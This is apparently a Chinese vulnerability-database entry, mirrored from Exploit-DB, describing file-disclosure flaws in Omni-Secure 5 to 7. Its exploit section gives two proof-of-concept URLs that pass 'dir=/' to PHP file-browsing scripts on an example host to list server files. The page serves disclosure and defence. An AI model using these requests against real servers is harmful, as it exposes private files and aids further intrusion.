Omni-Secure - 'dir' Multiple File Disclosure Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1064459 漏洞类型
发布时间 2012-11-19 更新时间 2012-11-19
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/38025
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/56575/info

Omni-Secure is prone to multiple file-disclosure vulnerabilities.

An attacker can exploit these issues to view local files in the context of the web server process. This may aid in further attacks.

Versions Omni-Secure 5, 6 and 7 are vulnerable. 

http://www.example.co/mpath/lib/browsefiles.php?dir=/

http://www.example.co/mpath/lib/browsefolders.php?dir=/